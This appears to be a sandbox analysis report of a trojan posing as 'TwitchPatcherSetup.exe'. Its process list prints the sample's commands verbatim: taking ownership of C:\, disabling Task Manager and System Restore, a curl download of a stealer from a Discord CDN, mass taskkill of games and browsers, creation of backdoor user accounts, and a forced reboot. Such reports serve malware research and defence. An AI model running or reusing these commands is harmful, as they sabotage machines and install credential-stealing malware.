| File opened (read-only) | \??\U: | C:\Windows\System32\WScript.exe | N/A |
| File opened (read-only) | \??\H: | C:\Windows\System32\WScript.exe | N/A |
| File opened (read-only) | \??\I: | C:\Windows\System32\WScript.exe | N/A |
| File opened (read-only) | \??\N: | C:\Windows\System32\WScript.exe | N/A |
| File opened (read-only) | \??\P: | C:\Windows\System32\WScript.exe | N/A |
| File opened (read-only) | \??\I: | C:\Windows\System32\WScript.exe | N/A |
| File opened (read-only) | \??\N: | C:\Windows\System32\WScript.exe | N/A |
| File opened (read-only) | \??\U: | C:\Windows\System32\WScript.exe | N/A |
| File opened (read-only) | \??\D: | C:\Windows\System32\WScript.exe | N/A |
| File opened (read-only) | \??\M: | C:\Windows\System32\WScript.exe | N/A |
| File opened (read-only) | \??\R: | C:\Windows\System32\WScript.exe | N/A |
| File opened (read-only) | \??\Z: | C:\Windows\System32\WScript.exe | N/A |
| File opened (read-only) | \??\J: | C:\Windows\System32\WScript.exe | N/A |
| File opened (read-only) | \??\K: | C:\Windows\System32\WScript.exe | N/A |
| File opened (read-only) | \??\O: | C:\Windows\System32\WScript.exe | N/A |
| File opened (read-only) | \??\T: | C:\Windows\System32\WScript.exe | N/A |
| File opened (read-only) | \??\S: | C:\Windows\System32\WScript.exe | N/A |
| File opened (read-only) | \??\Y: | C:\Windows\System32\WScript.exe | N/A |
Sets desktop wallpaper using registry
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Control Panel\Desktop\wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1617997407-risitas.jpg" | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Control Panel\Desktop\wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1617997407-risitas.jpg" | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Control Panel\Desktop\wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1617997407-risitas.jpg" | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Control Panel\Desktop\wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1617997407-risitas.jpg" | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Control Panel\Desktop\wallpaper | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Control Panel\Desktop\wallpaper | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Control Panel\Desktop\wallpaper | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Control Panel\Desktop\wallpaper | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Control Panel\Desktop\wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1617997407-risitas.jpg" | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Control Panel\Desktop\wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1617997407-risitas.jpg" | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Control Panel\Desktop\wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1617997407-risitas.jpg" | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Control Panel\Desktop\wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1617997407-risitas.jpg" | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Control Panel\Desktop\wallpaper | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Control Panel\Desktop\wallpaper | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Control Panel\Desktop\wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1617997407-risitas.jpg" | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Control Panel\Desktop\wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1617997407-risitas.jpg" | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Control Panel\Desktop\wallpaper | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Control Panel\Desktop\wallpaper | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Control Panel\Desktop\wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1617997407-risitas.jpg" | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Control Panel\Desktop\wallpaper | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Control Panel\Desktop\wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1617997407-risitas.jpg" | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Control Panel\Desktop\wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1617997407-risitas.jpg" | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Control Panel\Desktop\wallpaper | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Control Panel\Desktop\wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1617997407-risitas.jpg" | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Control Panel\Desktop\wallpaper | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Control Panel\Desktop\wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1617997407-risitas.jpg" | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Control Panel\Desktop\wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1617997407-risitas.jpg" | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Control Panel\Desktop\wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1617997407-risitas.jpg" | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Control Panel\Desktop\wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1617997407-risitas.jpg" | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Control Panel\Desktop\wallpaper | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Control Panel\Desktop\wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1617997407-risitas.jpg" | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Control Panel\Desktop\wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1617997407-risitas.jpg" | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Control Panel\Desktop\wallpaper | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Control Panel\Desktop\wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1617997407-risitas.jpg" | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Control Panel\Desktop\wallpaper | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Control Panel\Desktop\wallpaper | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Control Panel\Desktop\wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1617997407-risitas.jpg" | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Control Panel\Desktop\wallpaper | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Control Panel\Desktop\wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1617997407-risitas.jpg" | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Control Panel\Desktop\wallpaper | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Control Panel\Desktop\wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1617997407-risitas.jpg" | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Control Panel\Desktop\wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1617997407-risitas.jpg" | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Control Panel\Desktop\wallpaper | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Control Panel\Desktop\wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1617997407-risitas.jpg" | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Control Panel\Desktop\wallpaper | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Control Panel\Desktop\wallpaper | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Control Panel\Desktop\wallpaper | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Control Panel\Desktop\wallpaper | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Control Panel\Desktop\wallpaper | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Control Panel\Desktop\wallpaper | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Control Panel\Desktop\wallpaper | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Control Panel\Desktop\wallpaper | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Control Panel\Desktop\wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1617997407-risitas.jpg" | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Control Panel\Desktop\wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1617997407-risitas.jpg" | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Control Panel\Desktop\wallpaper | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Control Panel\Desktop\wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1617997407-risitas.jpg" | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Control Panel\Desktop\wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1617997407-risitas.jpg" | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Control Panel\Desktop\wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1617997407-risitas.jpg" | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Control Panel\Desktop\wallpaper | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Control Panel\Desktop\wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1617997407-risitas.jpg" | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Control Panel\Desktop\wallpaper | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Control Panel\Desktop\wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1617997407-risitas.jpg" | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Control Panel\Desktop\wallpaper | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Control Panel\Desktop\wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1617997407-risitas.jpg" | C:\Windows\system32\reg.exe | N/A |
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Program Files\Java\jre-1.8\bin\server\classes.jsa | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk-1.8\jre\bin\server\classes.jsa | C:\Windows\system32\cmd.exe | N/A |
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\melter.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
Delays execution with timeout.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\timeout.exe | N/A |
| N/A | N/A | C:\Windows\system32\timeout.exe | N/A |
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000_Classes\Local Settings | C:\Windows\system32\cmd.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000_Classes\Local Settings | C:\Windows\system32\cmd.exe | N/A |
Runs net.exe
Script User-Agent
| Description | Indicator | Process | Target |
| HTTP User-Agent header | Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) | N/A | N/A |
| HTTP User-Agent header | Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) | N/A | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\takeown.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\takeown.exe | N/A |
| Token: 33 | N/A | C:\Windows\system32\AUDIODG.EXE | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\system32\AUDIODG.EXE | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\taskkill.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\system32\shutdown.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\system32\shutdown.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\WScript.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\WScript.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\WScript.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\WScript.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\WScript.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\WScript.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\TwitchPatcherSetup.exe
"C:\Users\Admin\AppData\Local\Temp\TwitchPatcherSetup.exe"
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\489D.tmp\489E.tmp\489F.bat C:\Users\Admin\AppData\Local\Temp\TwitchPatcherSetup.exe"
C:\Windows\system32\takeown.exe
takeown /f C:\*.*
C:\Windows\system32\icacls.exe
Icacls C:\*.* /C /G Admin:F
C:\Windows\system32\reg.exe
REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v DisableTaskMgr /t REG_DWORD /d 1 /f
C:\Windows\system32\reg.exe
reg add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\SystemRestore" /v DisableSR /t REG_DWORD /d 1 /f
C:\Windows\system32\curl.exe
curl "https://cdn.discordapp.com/attachments/1195864694343336009/1198255413704007800/cstealer.exe" --output salope.exe
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --field-trial-handle=4448,i,1602949858158667699,12464335823361976127,262144 --variations-seed-version --mojo-platform-channel-handle=4412 /prefetch:8
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\9391.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\26921.vbs"
C:\Windows\system32\timeout.exe
timeout 60
C:\Windows\system32\rundll32.exe
rundll32 user32.dll, SwapMouseButton
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\14246.vbs"
C:\Windows\system32\timeout.exe
timeout 14
C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x394 0x4f4
C:\Windows\system32\taskkill.exe
taskkill /F /IM hl2.exe
C:\Windows\system32\taskkill.exe
taskkill /F /IM javaw.exe
C:\Windows\system32\taskkill.exe
taskkill /F /IM RobloxPlayerBeta.exe
C:\Windows\system32\taskkill.exe
taskkill /F /IM FortniteClient-Win64-Shipping.exe
C:\Windows\system32\taskkill.exe
taskkill /F /IM Among Us.exe
C:\Windows\system32\taskkill.exe
taskkill /F /IM chrome.exe
C:\Windows\system32\taskkill.exe
taskkill /F /IM firefox.exe
C:\Windows\system32\taskkill.exe
taskkill /F /IM msedge.exe
C:\Windows\system32\taskkill.exe
taskkill /F /IM brave.exe
C:\Windows\system32\taskkill.exe
taskkill /F /IM iexplore.exe
C:\Windows\system32\taskkill.exe
taskkill /F /IM explorer.exe
C:\Windows\system32\shutdown.exe
shutdown -r -t 300 -c "Dans 5 minutes tu n'as plus de PC fils de viol, la OGK t'a bien baiser le cul :)"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\23948.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\20725.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\4235.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\26852.vbs" 28089.bat
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\31845.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\31845.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\31845.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\31845.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\31845.vbs"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\28089.bat" "
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\31845.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\31845.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\31845.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\31845.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\31845.vbs"
C:\Windows\system32\net.exe
net user LE bitasse /add /expire:never /active:yes
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user LE bitasse /add /expire:never /active:yes
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\risitas.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1617997407-risitas.jpg" /f
C:\Windows\system32\reg.exe
reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
C:\Users\Admin\AppData\Local\Temp\melter.exe
melter.exe
C:\Windows\system32\net.exe
net user 18-25 bitasse /add /expire:never /active:yes
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user 18-25 bitasse /add /expire:never /active:yes
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\system32\net.exe
net user T'A bitasse /add /expire:never /active:yes
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user T'A bitasse /add /expire:never /active:yes
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\31845.vbs"
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
C:\Windows\system32\net.exe
net user BIEN bitasse /add /expire:never /active:yes
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user BIEN bitasse /add /expire:never /active:yes
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1617997407-risitas.jpg" /f
C:\Windows\system32\net.exe
net user D?TRUIT bitasse /add /expire:never /active:yes
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user D?TRUIT bitasse /add /expire:never /active:yes
C:\Windows\system32\reg.exe
reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
C:\Windows\system32\net.exe
net user LE bitasse /add /expire:never /active:yes
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user LE bitasse /add /expire:never /active:yes
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
C:\Windows\system32\net.exe
net user CUL bitasse /add /expire:never /active:yes
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user CUL bitasse /add /expire:never /active:yes
C:\Windows\system32\net.exe
net user ENFANT bitasse /add /expire:never /active:yes
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\31845.vbs"
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user ENFANT bitasse /add /expire:never /active:yes
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1617997407-risitas.jpg" /f
C:\Windows\system32\net.exe
net user DE bitasse /add /expire:never /active:yes
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user DE bitasse /add /expire:never /active:yes
C:\Windows\system32\reg.exe
reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
C:\Windows\system32\net.exe
net user SATAN bitasse /add /expire:never /active:yes
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user SATAN bitasse /add /expire:never /active:yes
C:\Windows\system32\net.exe
net user 941488320898 bitasse /add /expire:never /active:yes
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user 941488320898 bitasse /add /expire:never /active:yes
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\31845.vbs"
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
C:\Windows\system32\net.exe
net user 18849574315444 bitasse /add /expire:never /active:yes
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user 18849574315444 bitasse /add /expire:never /active:yes
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1617997407-risitas.jpg" /f
C:\Windows\system32\reg.exe
reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
C:\Windows\system32\net.exe
net user 26022636112598 bitasse /add /expire:never /active:yes
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user 26022636112598 bitasse /add /expire:never /active:yes
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\system32\net.exe
net user 214902539824108 bitasse /add /expire:never /active:yes
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user 214902539824108 bitasse /add /expire:never /active:yes
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\31845.vbs"
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
